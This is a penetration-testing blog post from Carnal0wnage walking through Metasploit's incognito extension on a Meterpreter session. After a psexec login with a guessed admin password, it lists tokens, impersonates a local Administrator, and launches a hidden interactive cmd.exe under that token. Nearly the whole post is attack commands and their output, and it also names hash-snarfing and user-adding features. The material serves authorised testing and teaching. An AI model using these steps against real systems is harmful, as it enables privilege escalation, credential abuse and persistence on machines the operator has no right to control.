From Carnal0wnage http://carnal0wnage.blogspot.com
Since a buddy asked for some clarification on using incognito extension with Metasploit/Meterpreter I’ll post some more notes on it.
the background you need is here:
http://www.mwrinfosecurity.com/publications/
mwri_security-implications-of-windows-access-tokens_2008-04-14.pdf
Let’s set up the scenario.
We either exploited something…yea! or we guessed an admin password and used the psexec module (that’s what I did). the psexec module will drop us to a SYSTEM shell if all went well.
msf exploit(psexec) > sessions
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.102:52595 -> 192.168.1.103:31851
msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: ORACLE-ENT
OS : Windows .NET Server (Build 3790, Service Pack 2).
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter > use incognito
Loading extension incognito...success.
now we want to query what tokens are available
Incognito Commands
==================
Command Description
------- -----------
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token
meterpreter > list_tokens
Usage: list_tokens
Lists all accessible tokens and their privilege level
OPTIONS:
-g List tokens by unique groupname
-u List tokens by unique username
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITYLOCAL SERVICE
NT AUTHORITYNETWORK SERVICE
NT AUTHORITYSYSTEM
ORACLE-ENTAdministrator
Impersonation Tokens Available
========================================
NT AUTHORITYANONYMOUS LOGON
We want to become the ORACLE-ENTAdministrator user
meterpreter > impersonate_token
Usage: impersonate_token
Instructs the meterpreter thread to impersonate the specified token. All other actions
will then be made in the context of that token.
Hint: Double backslash DOMAIN\name (meterpreter quirk)
Hint: Enclose with quotation marks if name contains a space
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter > impersonate_token ORACLE-ENT\Administrator
[+] Delegation token available
[+] Successfully impersonated user ORACLE-ENTAdministrator
meterpreter > getuid
Server username: ORACLE-ENTAdministrator
Ok, should you need to get back to system, just do a rev2self
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter > impersonate_token ORACLE-ENT\Administrator
[+] Delegation token available
[+] Successfully impersonated user ORACLE-ENTAdministrator
meterpreter > getuid
Server username: ORACLE-ENTAdministrator
Now you’ll probably want to run commands as that user…I hope that was the point of all this…
After you load the incognito extension you’ll get an extra option with your execute options (-t)
meterpreter > execute
Usage: execute -f file [options]
Executes a command on the remote machine.
OPTIONS:
-H Create the process hidden from view.
-a The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d The 'dummy' executable to launch when using -m.
-f The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-m Execute from memory.
-t Execute process with currently impersonated thread token
We need to use the “-t” so we can use the impersonated thread token, otherwise you’ll get a shell as SYSTEM or whoever you were.
meterpreter > execute -f cmd.exe -H -c -i -t
Process 2936 created.
Channel 6 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:>whoami
whoami
oracle-entadministrator
C:>
